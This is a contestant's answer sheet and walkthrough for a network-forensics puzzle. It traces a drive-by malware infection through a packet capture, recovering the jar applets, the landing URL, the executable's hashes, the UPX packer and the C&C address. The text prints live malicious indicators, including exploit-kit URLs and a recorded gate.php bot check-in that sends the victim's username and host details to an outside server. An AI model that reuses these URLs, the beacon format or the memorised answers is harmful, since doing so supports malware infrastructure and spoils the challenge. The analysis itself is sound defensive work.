Name: Iñaki Rodríguez
Email: irodriguez@virtualminds.es

Answer 1a: sdfg.jar
Answer 1b: q.jar
Answer 2: ADMINISTRATOR
Answer 3: http://nrtjo.eu/true.php
Answer 4: 5942BA36CF732097479C51986EEE91ED
Answer 5: UPX
Answer 6: 0f37839f48f7fc77e6d50e14657fb96e
Answer 7: 213.155.29.144

Description:
------------------------------------------------------------------------------------------

Q1. As part of the infection process, Ms. Moneymany’s browser downloaded two Java applets. What were the names of the two .jar files that implemented these applets?

A1. First, we extract every TCP stream from the pcap with tcpflow. It writes one file per direction, named srcip.srcport-dstip.dstport (zero-padded), so a client's requests and the server's replies end up in two separate files:

pentest@morgul:~/forensic/streams$ tcpflow -r ../infected.pcap
pentest@morgul:~/forensic/streams$ ls
059.053.091.102.00080-192.168.023.129.01061  192.168.023.129.01063-059.053.091.102.00080
059.053.091.102.00080-192.168.023.129.01063  192.168.023.129.01064-059.053.091.102.00080
059.053.091.102.00080-192.168.023.129.01064  192.168.023.129.01065-059.053.091.102.00080
059.053.091.102.00080-192.168.023.129.01065  192.168.023.129.01066-059.053.091.102.00080
059.053.091.102.00080-192.168.023.129.01066  192.168.023.129.01067-059.053.091.102.00080
059.053.091.102.00080-192.168.023.129.01067  192.168.023.129.01068-213.155.029.144.00444
065.055.195.250.00443-192.168.023.129.01062  192.168.023.129.01069-212.252.032.020.00080
192.168.023.129.01061-059.053.091.102.00080  212.252.032.020.00080-192.168.023.129.01069
192.168.023.129.01062-065.055.195.250.00443

Note that there is no 213.155.029.144.00444-... file: the host on port 444 never sent any payload back (see Q7).

Next we run the file carver foremost over the extracted streams and look in its output directory for jar files:

pentest@morgul:~/forensic/streams$ ls -d output*
output_Sat_Apr_17_02_00_44_2010
pentest@morgul:~/forensic/streams$ cd output_Sat_Apr_17_02_00_44_2010/
pentest@morgul:~/forensic/streams/output_Sat_Apr_17_02_00_44_2010$ ls
audit.txt  exe  htm  jar

foremost created a jar directory, so we only need to look there for the two applets:

pentest@morgul:~/forensic/streams/output_Sat_Apr_17_02_00_44_2010$ cd jar/
pentest@morgul:~/forensic/streams/output_Sat_Apr_17_02_00_44_2010/jar$ ls
00000000_1.jar  00000000.jar

We also unzip both files (a jar is just a zip archive) to check that foremost carved them intact:

pentest@morgul:~/forensic/streams/output_Sat_Apr_17_02_00_44_2010/jar$ unzip 00000000_1.jar
Archive:  00000000_1.jar
  inflating: AppletPanel.class
  inflating: Main.class
pentest@morgul:~/forensic/streams/output_Sat_Apr_17_02_00_44_2010/jar$ unzip 00000000.jar
Archive:  00000000.jar
   creating: META-INF/
 extracting: META-INF/MANIFEST.MF
   creating: myf/
   creating: myf/y/
  inflating: myf/y/AppletX.class
  inflating: myf/y/LoaderX.class
  inflating: myf/y/PX.class

foremost names carved files by offset, so to recover the original file names we look up the requests for .jar in the client-side streams. grep -n5 prints five lines of context, enough to reach the Host header; the second grep keeps only the request line and the Host line:

pentest@morgul:~/forensic/streams$ grep -n5 jar * | grep -E "jar|Host"
192.168.023.129.01064-059.053.091.102.00080:1:GET /sdfg.jar HTTP/1.1
192.168.023.129.01064-059.053.091.102.00080-5-Host: nrtjo.eu
192.168.023.129.01065-059.053.091.102.00080:1:GET /q.jar HTTP/1.1
192.168.023.129.01065-059.053.091.102.00080-5-Host: nrtjo.eu

That gives the answer:

1. sdfg.jar (http://nrtjo.eu/sdfg.jar)
2. q.jar (http://nrtjo.eu/q.jar)

Alternative: list every HTTP request straight from the pcap with tshark (-R worked as a display filter in the tshark version used here; newer versions expect -Y):

pentest@morgul:~/forensic$ tshark -T fields -e ip.dst -e http.host -e http.request.method -e http.request.uri -r infected.pcap -R http.request
59.53.91.102    nrtjo.eu     GET  /true.php
59.53.91.102    nrtjo.eu     GET  /xxx.xxx
59.53.91.102    nrtjo.eu     GET  /favicon.ico
59.53.91.102    nrtjo.eu     GET  /q.jar
59.53.91.102    nrtjo.eu     GET  /sdfg.jar
59.53.91.102    nrtjo.eu     GET  //loading.php?spl=javadnw&J050006010
59.53.91.102    nrtjo.eu     GET  //loading.php?spl=javad0
212.252.32.20   freeways.in  GET  /11111/gate.php?guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1&ver=10084&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=92&ccrc=5A4F4DF7&md5=5942ba36cf732097479c51986eee91ed

------------------------------------------------------------------------------------------

Q2. What was Ms. Moneymany’s username on the infected Windows system?

A2.
Using tshark and Wireshark we take a preliminary look at the contents of the pcap:

........
293 50.609172 192.168.23.129 -> 212.252.32.20 HTTP GET /11111/gate.php?guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1&ver=10084&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=92&ccrc=5A4F4DF7&md5=5942ba36cf732097479c51986eee91ed HTTP/1.1
........

This request looks like a check-in with a C&C server that reports the infected machine's details in the query string: guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1 carries the user name (ADMINISTRATOR) followed by the machine name and an identifier, ut=Admin is presumably the user type, ie=8.0.6001.18702 is the Internet Explorer version, os=5.1.2600 is Windows XP, and md5= is the MD5 hash of the malware file (the same value we recover in Q4). So the answer is ADMINISTRATOR.

------------------------------------------------------------------------------------------

Q3. What was the starting URL of this incident? In other words, on which URL did Ms. Moneymany probably click?

A3. With tshark we list all HTTP requests, this time including the client port so that requests on the same connection can be grouped:

irodriguez@morgul:~/forensic$ tshark -T fields -e ip.src -e tcp.srcport -e ip.dst -e http.host -e http.request.method -e http.request.uri -r infected.pcap -R http.request
192.168.23.129  1061  59.53.91.102   nrtjo.eu     GET  /true.php
192.168.23.129  1061  59.53.91.102   nrtjo.eu     GET  /xxx.xxx
192.168.23.129  1063  59.53.91.102   nrtjo.eu     GET  /favicon.ico
192.168.23.129  1065  59.53.91.102   nrtjo.eu     GET  /q.jar
192.168.23.129  1064  59.53.91.102   nrtjo.eu     GET  /sdfg.jar
192.168.23.129  1066  59.53.91.102   nrtjo.eu     GET  //loading.php?spl=javadnw&J050006010
192.168.23.129  1067  59.53.91.102   nrtjo.eu     GET  //loading.php?spl=javad0
192.168.23.129  1069  212.252.32.20  freeways.in  GET  /11111/gate.php?guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1&ver=10084&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=92&ccrc=5A4F4DF7&md5=5942ba36cf732097479c51986eee91ed

The first request is for http://nrtjo.eu/true.php, so we need to confirm that it really is the page that started the chain. We look at the server's reply in the tcpflow output, file 059.053.091.102.00080-192.168.023.129.01061 (srcip.srcport-dstip.dstport, i.e. the server side of the connection from client port 1061).
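The tshark listing above is enough for Q1 to Q3. As an added example (not part of the original write-up), the following Python script does the same job over the tcpflow client-side streams: it rebuilds full URLs from the request line plus the Host header, orders them by client port, picks out the .jar downloads and decodes the gate.php check-in. The stream contents are constructed here to mimic the capture and the function names are my own.

```python
"""Reconstruct the HTTP requests from tcpflow client-side streams and decode the
gate.php check-in. Added example; the stream contents below are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed client->server streams, keyed by tcpflow file name (srcip.srcport-dstip.dstport).
# Only the request lines and Host headers matter; the other headers are filler.
SAMPLE_STREAMS = {
    "192.168.023.129.01061-059.053.091.102.00080":
        "GET /true.php HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0)\r\n"
        "Host: nrtjo.eu\r\nConnection: Keep-Alive\r\n\r\n"
        "GET /xxx.xxx HTTP/1.1\r\nHost: nrtjo.eu\r\n\r\n",        # keep-alive: two requests, one stream
    "192.168.023.129.01065-059.053.091.102.00080":
        "GET /q.jar HTTP/1.1\r\nHost: nrtjo.eu\r\n\r\n",
    "192.168.023.129.01064-059.053.091.102.00080":
        "GET /sdfg.jar HTTP/1.1\r\nHost: nrtjo.eu\r\n\r\n",
    "192.168.023.129.01069-212.252.032.020.00080":
        "GET /11111/gate.php?guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1&ver=10084&stat=ONLINE"
        "&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=92&ccrc=5A4F4DF7"
        "&md5=5942ba36cf732097479c51986eee91ed HTTP/1.1\r\nHost: freeways.in\r\n\r\n",
}

REQUEST_LINE = re.compile(r"^(GET|POST|HEAD) (\S+) HTTP/1\.[01]$")

def parse_flow_name(name):
    """'192.168.023.129.01064-059.053.091.102.00080' -> ('192.168.23.129', 1064, '59.53.91.102', 80)."""
    def endpoint(text):
        parts = text.split(".")
        return ".".join(str(int(p)) for p in parts[:4]), int(parts[4])   # drop zero padding
    src, dst = name.split("-")
    return endpoint(src) + endpoint(dst)

def requests_in_stream(text):
    """Yield (method, url) for every request in one client stream (request bodies are not handled)."""
    for message in text.split("\r\n\r\n"):
        lines = message.split("\r\n")
        m = REQUEST_LINE.match(lines[0])
        if not m:
            continue
        headers = dict((k.strip().lower(), v.strip()) for k, _, v in
                       (line.partition(":") for line in lines[1:]) if k)
        yield m.group(1), "http://%s%s" % (headers.get("host", "?"), m.group(2))

def list_requests(streams, ports=(80, 8080)):
    """[(client_port, method, url)] in connection order. Sorting by client port is a heuristic
    (Windows XP hands out ephemeral ports sequentially); frame times in the pcap are authoritative."""
    out = []
    for name, text in streams.items():
        _, sport, _, dport = parse_flow_name(name)
        if dport in ports:
            out.extend((sport, method, url) for method, url in requests_in_stream(text))
    out.sort(key=lambda r: r[0])                     # stable sort keeps in-stream order per connection
    return out

def jar_downloads(streams):
    return [url for _, _, url in list_requests(streams) if urlsplit(url).path.lower().endswith(".jar")]

def decode_beacon(url):
    """Split the gate.php query; guid looks like USER!HOSTNAME!ID (ID presumably a machine identifier)."""
    fields = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    fields["user"], fields["hostname"] = (fields.get("guid", "").split("!") + ["", ""])[:2]
    return fields

def find_beacon(streams):
    for _, _, url in list_requests(streams):
        if urlsplit(url).path.endswith("gate.php"):
            return decode_beacon(url)
    return None

if __name__ == "__main__":
    for port, method, url in list_requests(SAMPLE_STREAMS):
        print(port, method, url)
    print("jars:", jar_downloads(SAMPLE_STREAMS))
    beacon = find_beacon(SAMPLE_STREAMS)
    print("beacon user/host:", beacon["user"], beacon["hostname"])
```

Ordering by client port is only an approximation: in the real listing the q.jar request on port 1065 was captured before sdfg.jar on port 1064, so when the order matters (as it does for "which URL came first" in Q3) use the frame timestamps from tshark rather than the port numbers.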
Opening that file with cat shows the HTTP headers followed by what looks like binary data:

irodriguez@morgul:~/forensic$ cat 059.053.091.102.00080-192.168.023.129.01061
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 17 Mar 2010 00:55:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 2000 00:00:00 GMT
Last-Modified: Thu, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Encoding: gzip

489
[binary gzip data]
.......

The headers explain it: the body is sent with Transfer-Encoding: chunked (the "489" line is the first chunk size, in hex, i.e. 1161 bytes) and compressed with Content-Encoding: gzip, so cat prints the compressed bytes. We try foremost on this file, but its default configuration has no gzip signature and it extracts nothing, so we teach it one. In /etc/foremost.conf we add the following line (\x1f\x8b is the gzip magic number, 150000 is the maximum size to carve and the footer is only a rough end marker):

gz y 150000 \x1f\x8b \x00\x00\x0d\x0a

After this, foremost carves the gzip stream and we can decompress it:

irodriguez@morgul:~/forensic$ foremost 059.053.091.102.00080-192.168.023.129.01061
Processing: 059.053.091.102.00080-192.168.023.129.01061
|*|
irodriguez@morgul:~/forensic$ cd output/
irodriguez@morgul:~/forensic/output$ ls
audit.txt  gz
irodriguez@morgul:~/forensic/output$ cd gz/
irodriguez@morgul:~/forensic/output/gz$ ls
00000000.gz
irodriguez@morgul:~/forensic/output/gz$ gunzip 00000000.gz
gzip: 00000000.gz: decompression OK, trailing garbage ignored
irodriguez@morgul:~/forensic/output/gz$ cat 00000000

The "trailing garbage" is most likely the chunked-encoding terminator that follows the gzip stream inside the carved block; gunzip stops at the end of the gzip member, so the decompressed page is complete.
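The foremost workaround above carves the gzip stream out of the chunked body by its magic number. As an added example (not from the write-up), this Python script does the decoding by honouring the HTTP framing instead: it splits headers from body, reassembles the chunked body, gunzips it and can hash the result. The same routine recovers a Content-Length download such as the executable in Q4 without a carving tool. Both responses are constructed inside the script (the "executable" is dummy bytes, not malware); the function names are my own.

```python
"""Decode an HTTP response body from a tcpflow server-side stream, honouring
Transfer-Encoding: chunked, Content-Length and Content-Encoding: gzip/deflate.
Added example; both responses below are constructed (the 'executable' is dummy bytes)."""
import gzip
import hashlib
import zlib

def chunked_gzip_response(html):
    """Build a response shaped like the true.php one: one gzip stream inside one chunk."""
    gz = gzip.compress(html, mtime=0)
    return (b"HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: text/html; charset=UTF-8\r\n"
            b"Transfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n\r\n"
            + b"%x\r\n%s\r\n0\r\n\r\n" % (len(gz), gz))             # chunk-size CRLF data CRLF 0 CRLF CRLF

HTML_SAMPLE = b"<html><body><script>/* obfuscated loader */</script><applet code='Main'></applet></body></html>"
SAMPLE_CHUNKED_GZIP = chunked_gzip_response(HTML_SAMPLE)

EXE_SAMPLE = b"MZ" + bytes(range(256)) * 4                           # constructed stand-in for file.exe
SAMPLE_CONTENT_LENGTH = (b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
                         b"Content-Length: %d\r\n\r\n" % len(EXE_SAMPLE)) + EXE_SAMPLE

def split_response(raw):
    """(status_line, headers, body) with header names lower-cased."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(b":")
        headers[k.strip().lower().decode()] = v.strip().decode(errors="replace")
    return lines[0].decode(errors="replace"), headers, body

def dechunk(body):
    """Reassemble a chunked body. Returns (data, bytes after the final 0 chunk)."""
    out, pos = bytearray(), 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)                # "489" -> 1161, extensions ignored
        pos = end + 2
        if size == 0:
            return bytes(out), body[pos:]                           # optional trailers + final CRLF
        out += body[pos:pos + size]
        pos += size + 2                                             # skip the CRLF that ends the chunk

def decode_body(raw):
    """Undo the transfer encoding, then the content encoding. Returns (headers, body)."""
    _, headers, body = split_response(raw)
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body, _ = dechunk(body)
    elif "content-length" in headers:
        body = body[:int(headers["content-length"])]              # also trims keep-alive leftovers
    enc = headers.get("content-encoding", "").lower()
    if enc == "gzip":
        body = gzip.decompress(body)
    elif enc == "deflate":
        try:
            body = zlib.decompress(body, -zlib.MAX_WBITS)           # raw deflate (most servers)
        except zlib.error:
            body = zlib.decompress(body)                            # zlib-wrapped variant
    return headers, body

def body_md5(raw):
    return hashlib.md5(decode_body(raw)[1]).hexdigest()

if __name__ == "__main__":
    headers, page = decode_body(SAMPLE_CHUNKED_GZIP)
    print(headers["content-type"], len(page), page[:32])
    print("file md5:", body_md5(SAMPLE_CONTENT_LENGTH))
```

Run it against a tcpflow server-side file by reading the file in binary mode and passing the bytes to decode_body; if the response carried several chunks, dechunk joins them before gunzip sees the data, which is exactly the case where a magic-number carve would hand gunzip a corrupt stream.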
Here we have the decompressed content: an obfuscated HTML page with JavaScript that loads two applets (the jar files from Q1). Since this is the landing page that started the applet downloads, the answer is http://nrtjo.eu/true.php.

------------------------------------------------------------------------------------------

Q4. As part of the infection, a malicious Windows executable file was downloaded onto Ms. Moneymany’s system. What was the file’s MD5 hash? (Hint: It ends on “91ed”.)

A4. This time foremost didn't help us. I tried tcpxtract too, without luck. Finally I used NetworkMiner to extract file.exe, with MD5 5942BA36CF732097479C51986EEE91ED. This is the same value the bot reported in the md5= parameter of the gate.php check-in seen in Q2, which is a good sanity check on the extraction.

------------------------------------------------------------------------------------------

Q5. What is the name of the packer used to protect the malicious Windows executable? Hint: This is one of the most popular freely-available packers seen in “mainstream” malware.

A5. Using pefile by Ero Carrera we can identify the packer: pefile can load the PEiD signature database (UserDB.TXT) and match its entry-point signatures against the file. The Debian python-pefile package ships an example script, pefile-match, that does exactly that:

morgul:/usr/share/doc/python-pefile/examples# wget http://www.peid.info/BobSoft/Downloads/UserDB.zip
--2010-05-09 00:15:48--  http://www.peid.info/BobSoft/Downloads/UserDB.zip
Resolving www.peid.info... 217.157.129.212
Connecting to www.peid.info|217.157.129.212|:80... connected.
HTTP request sent, awaiting response...
200 OK
Length: 93822 (92K) [application/zip]
Saving to: `UserDB.zip'

100%[===================================================================================>] 93,822      18.2K/s   in 5.0s

2010-05-09 00:15:53 (18.2 KB/s) - `UserDB.zip' saved [93822/93822]

morgul:/usr/share/doc/python-pefile/examples# unzip UserDB.zip
Archive:  UserDB.zip
  inflating: UserDB.TXT
morgul:/usr/share/doc/python-pefile/examples# python pefile-match UserDB.TXT /home/irodriguez/forensic/file.exe
/home/irodriguez/forensic/file.exe.octet-stream: [['UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser'], ['Crypto-Lock v2.02 (Eng) -> Ryan Thian']]
morgul:/usr/share/doc/python-pefile/examples#

The entry-point bytes match the UPX 2.90 signature, so the file is UPX-packed. A second signature (Crypto-Lock) fires as well. Stacking packers is common in modern malware to get past signature-based detectors, but PEiD signatures also overlap, so a second hit on its own can be a false positive; the clean upx -d in Q6 confirms that UPX is the outer layer. I also ran another packer detector (RDG Packer Detector) and it detects UPX too.

------------------------------------------------------------------------------------------

Q6. What is the MD5 hash of the unpacked version of the malicious Windows executable file?

A6. We could dump the process from memory, or use upx itself to unpack the file. Malware authors sometimes modify the packer so that the stock tool refuses the file, but this time the upx command works:

irodriguez@morgul:~/forensic$ upx -d file.exe
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2009
UPX 3.04        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 27th 2009

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     82432 <-     68096   82.61%    win32/pe     file.exe

Unpacked 1 file.
irodriguez@morgul:~/forensic$ md5sum file.exe
0f37839f48f7fc77e6d50e14657fb96e  file.exe

After unpacking, the MD5 is 0f37839f48f7fc77e6d50e14657fb96e. Note that upx -d overwrites file.exe in place; keep a copy of the packed sample (or write the output elsewhere with upx -d -o unpacked.exe file.exe) so that the hash from Q4 can still be reproduced. We also open the unpacked file.exe in Immunity Debugger and IDA Pro to make sure the unpack is correct; both load it without problems.

------------------------------------------------------------------------------------------

Q7.
The malicious executable attempts to connect to an Internet host using an IP address which is hard-coded into it (there was no DNS lookup). What is the IP address of that Internet host?

A7. The sample is heavily obfuscated. Opening it in a debugger shows no network functions in the import table; tracing it, or opening it in IDA, shows that it builds its own import table at run time with LdrLoadDll, through which it loads other libraries (including wininet.dll) and resolves their functions. Rather than following that, I used another method based on discarding the IPs that were resolved through DNS in infected.pcap:

1. Get the unique source IPs in the capture:

irodriguez@morgul:~/forensic$ tshark -r infected.pcap -Tfields -e ip.src | sort | uniq
192.168.23.129
192.168.23.2
212.252.32.20
213.155.29.144
59.53.91.102
65.55.195.250

2. Get the addresses returned in DNS responses (the cut pipeline pulls the answer address out of each "response A" line):

irodriguez@morgul:~/forensic$ tshark -r infected.pcap -R dns | grep "response A" | cut -d'-' -f 2 | cut -d' ' -f 8 | sort | uniq
212.252.32.20
59.53.91.102

3. Discard the internal addresses (192.168.23.x) and the resolved ones, which leaves:

213.155.29.144
65.55.195.250

Only two of the six IPs were never resolved through DNS, so the answer must be one of them. We start with 65.55.195.250.
First, let's see what traffic it generated:

irodriguez@morgul:~/forensic$ tshark -r infected.pcap -R 'ip.src==65.55.195.250 || ip.dst==65.55.195.250'
 17 6.632424 192.168.23.129 -> 65.55.195.250 TCP veracity > https [SYN] Seq=0 Win=64240 Len=0 MSS=1460
 18 6.714673 65.55.195.250 -> 192.168.23.129 TCP https > veracity [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460
 19 6.720153 192.168.23.129 -> 65.55.195.250 TCP veracity > https [ACK] Seq=1 Ack=1 Win=64240 Len=0
 20 6.720171 192.168.23.129 -> 65.55.195.250 SSL Client Hello
 21 6.720195 65.55.195.250 -> 192.168.23.129 TCP https > veracity [ACK] Seq=1 Ack=103 Win=64240 Len=0
 22 6.956602 65.55.195.250 -> 192.168.23.129 TCP [TCP segment of a reassembled PDU]
 23 6.956628 65.55.195.250 -> 192.168.23.129 TCP [TCP segment of a reassembled PDU]
 24 6.956636 65.55.195.250 -> 192.168.23.129 TCP [TCP segment of a reassembled PDU]
 25 6.956642 65.55.195.250 -> 192.168.23.129 TLSv1 Server Hello, Certificate, Server Hello Done
 26 6.957309 192.168.23.129 -> 65.55.195.250 TCP veracity > https [ACK] Seq=103 Ack=4510 Win=64240 Len=0
 27 6.964091 192.168.23.129 -> 65.55.195.250 TLSv1 Client Key Exchange, Change Cipher Spec, Encrypted Handshake Message
 28 6.964112 65.55.195.250 -> 192.168.23.129 TCP https > veracity [ACK] Seq=4510 Ack=285 Win=64240 Len=0
 29 7.053873 65.55.195.250 -> 192.168.23.129 TLSv1 Change Cipher Spec, Encrypted Handshake Message
 30 7.063385 192.168.23.129 -> 65.55.195.250 TLSv1 Application Data
 31 7.063678 65.55.195.250 -> 192.168.23.129 TCP https > veracity [ACK] Seq=4553 Ack=1319 Win=64240 Len=0
 33 7.224818 65.55.195.250 -> 192.168.23.129 TLSv1 Application Data
 34 7.225234 192.168.23.129 -> 65.55.195.250 TCP veracity > https [ACK] Seq=1319 Ack=5389 Win=63362 Len=0
 35 7.225891 192.168.23.129 -> 65.55.195.250 TCP veracity > https [FIN, ACK] Seq=1319 Ack=5389 Win=63362 Len=0
 36 7.225902 65.55.195.250 -> 192.168.23.129 TCP https > veracity [ACK] Seq=5389 Ack=1320 Win=64239 Len=0

This is a TLS session to port 443: a full handshake (Client Hello, Server Hello with certificate, key exchange) followed by a little application data in each direction. The "veracity" label is just tshark's service name for client port 1062.
Now we can look at the X.509 certificate the host presents and at the whois record for 65.55.195.250. Note that openssl s_client opens a new connection from the analysis machine, so this is the certificate the host serves at the time of the analysis, not the one in the capture; the latter could be read directly from the Certificate message in frame 25 with Wireshark or tshark.

irodriguez@morgul:~/forensic$ openssl s_client -host 65.55.195.250 -port 443
CONNECTED(00000003)
depth=2 /CN=Microsoft Internet Authority
verify error:num=20:unable to get local issuer certificate
verify return:0
---
Certificate chain
 0 s:/C=US/ST=Washington/L=Redmond/O=Microsoft Corporation/OU=Windows Live Operations/CN=urs.microsoft.com
   i:/DC=com/DC=microsoft/DC=corp/DC=redmond/CN=Microsoft Secure Server Authority
 1 s:/DC=com/DC=microsoft/DC=corp/DC=redmond/CN=Microsoft Secure Server Authority
   i:/CN=Microsoft Internet Authority
 2 s:/CN=Microsoft Internet Authority
   i:/C=US/O=GTE Corporation/OU=GTE CyberTrust Solutions, Inc./CN=GTE CyberTrust Global Root
.....

The certificate is for urs.microsoft.com, the URL reputation service that Internet Explorer 8's SmartScreen filter queries over HTTPS, so this looks like a legitimate connection made by the browser rather than by the malware (the verify error only means openssl was not given a CA bundle to check the chain against). Let's see the whois information:

irodriguez@morgul:~/forensic$ whois 65.55.195.250
OrgName:    Microsoft Corp
OrgID:      MSFT
Address:    One Microsoft Way
City:       Redmond
StateProv:  WA
PostalCode: 98052
Country:    US

NetRange:   65.52.0.0 - 65.55.255.255
CIDR:       65.52.0.0/14
NetName:    MICROSOFT-1BLK
NetHandle:  NET-65-52-0-0-1
Parent:     NET-65-0-0-0-0
NetType:    Direct Assignment
NameServer: NS1.MSFT.NET
NameServer: NS5.MSFT.NET
NameServer: NS2.MSFT.NET
NameServer: NS3.MSFT.NET
NameServer: NS4.MSFT.NET
Comment:
RegDate:    2001-02-14
Updated:    2004-12-09
..........

Microsoft again. Finally we look up the AS information at http://www.serversniff.net/as-info.php:

IP-Address:          65.55.195.250
AS-Number:           8075
Description:         MICROSOFT-CORP---MSN-AS-BLOCK - Microsoft Corp
AS-Peers:            AS701 AS1299 AS2516 AS2914 AS3320 AS3356 AS4565 AS4657 AS6453 AS19401
AS Range (cidr):     65.55.192.0/18
AS Range (ip):       65.55.192.0-65.55.255.255
AS Country:          US
AS RIR:              arin
AS Allocation Date:  1997-03-31

So this IP belongs to Microsoft, and the TLS session is almost certainly browser traffic rather than the malware's connection.
Now it is time to investigate 213.155.29.144:

irodriguez@morgul:~/forensic$ tshark -r infected.pcap -R 'ip.src==213.155.29.144 || ip.dst==213.155.29.144'
275 46.938655 192.168.23.129 -> 213.155.29.144 TCP instl_bootc > snpp [SYN] Seq=0 Win=64240 Len=0 MSS=1460
276 47.151484 213.155.29.144 -> 192.168.23.129 TCP snpp > instl_bootc [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460
277 47.151501 192.168.23.129 -> 213.155.29.144 TCP instl_bootc > snpp [ACK] Seq=1 Ack=1 Win=64240 Len=0
278 47.153472 192.168.23.129 -> 213.155.29.144 TCP instl_bootc > snpp [PSH, ACK] Seq=1 Ack=1 Win=64240 Len=263
279 47.153487 192.168.23.129 -> 213.155.29.144 TCP instl_bootc > snpp [FIN, ACK] Seq=264 Ack=1 Win=64240 Len=0
280 47.153492 213.155.29.144 -> 192.168.23.129 TCP snpp > instl_bootc [ACK] Seq=1 Ack=264 Win=64240 Len=0
281 47.153495 213.155.29.144 -> 192.168.23.129 TCP snpp > instl_bootc [ACK] Seq=1 Ack=265 Win=64239 Len=0
282 47.456882 213.155.29.144 -> 192.168.23.129 TCP snpp > instl_bootc [FIN, PSH, ACK] Seq=1 Ack=265 Win=64239 Len=0
283 47.458486 192.168.23.129 -> 213.155.29.144 TCP instl_bootc > snpp [ACK] Seq=265 Ack=2 Win=64240 Len=0

tshark labels port 444 as snpp because that is the service registered for 444/tcp: SNPP, the Simple Network Paging Protocol, a text-based protocol used for pagers (http://en.wikipedia.org/wiki/Simple_Network_Paging_Protocol). That is only a port-table label. What we actually see is the client sending a single 263-byte segment (frame 278) and closing, while the server answers with nothing but ACKs and a FIN, and the payload, as tshark -x shows, is not human readable. Only the handshake packets are reproduced below; note that in the IP header of the SYN the destination address appears as d5 9b 1d 90 (213.155.29.144) and the destination port as 01 bc (444):

irodriguez@morgul:~/forensic$ tshark -r infected.pcap -R 'ip.dst==213.155.29.144' -x
275 46.938655 192.168.23.129 -> 213.155.29.144 TCP instl_bootc > snpp [SYN] Seq=0 Win=64240 Len=0 MSS=1460

0000  00 50 56 f5 48 d4 00 0c 29 ca 2a f2 08 00 45 00   .PV.H...).*...E.
0010  00 30 01 96 40 00 80 06 2d dd c0 a8 17 81 d5 9b   .0..@...-.......
0020  1d 90 04 2c 01 bc 8c ec 94 86 00 00 00 00 70 02   ...,..........p.
0030  fa f0 95 7e 00 00 02 04 05 b4 01 01 04 02         ...~..........
irodriguez@morgul:~/forensic$ tshark -r infected.pcap -R 'ip.src==213.155.29.144' -x
276 47.151484 213.155.29.144 -> 192.168.23.129 TCP snpp > instl_bootc [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460

0000  00 0c 29 ca 2a f2 00 50 56 f5 48 d4 08 00 45 00   ..).*..PV.H...E.
0010  00 2c 00 d5 00 00 80 06 6e a2 d5 9b 1d 90 c0 a8   .,......n.......
0020  17 81 01 bc 04 2c 3b 65 59 30 8c ec 94 87 60 12   .....,;eY0....`.
0030  fa f0 15 df 00 00 02 04 05 b4 00 00               ............

Next we ask whois:

irodriguez@morgul:~/forensic$ whois 213.155.29.144
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: This output has been filtered.
%       To receive output for a database update, use the "-B" flag.

% Information related to '213.155.29.144 - 213.155.29.151'

inetnum:        213.155.29.144 - 213.155.29.151
netname:        alexjohnes
descr:          alexjohnes - Taras Zadorojniy
country:        NA
admin-c:        TMUA171-RIPE
tech-c:         TMUA171-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-HOSTINGUA
source:         RIPE # Filtered

person:         Taras Zadorojniy
address:        UA,74800, Kahovka ,Voroshilova str. 1, apt. 20
phone:          +38 048 7281518
nic-hdl:        TMUA171-RIPE
abuse-mailbox:  abuse@hosting.ua
source:         RIPE # Filtered

% Information related to '213.155.0.0/19AS41665'

route:          213.155.0.0/19
descr:          Datacenter Hosting.UA
origin:         AS41665
mnt-by:         MNT-HOSTINGUA
source:         RIPE # Filtered

So the host sits in a small (/29) customer assignment at a hosting provider in Ukraine (nothing against that country). A Google search for 213.155.29.144 also leads to the ThreatExpert report for our sample, http://www.threatexpert.com/report.aspx?md5=5942ba36cf732097479c51986eee91ed (the URL carries the MD5 of the packed file from Q4), whose analysis reads:

............
    * The following Host Name was requested from a host database:
          o 213.155.29.144
    * There was registered attempt to establish connection with the remote host. The connection details are:
      Remote Host       Port Number
      213.155.29.144    444
............

The sandbox saw the same connection attempt to 213.155.29.144 on port 444 that we have in the pcap, so the last answer is 213.155.29.144.
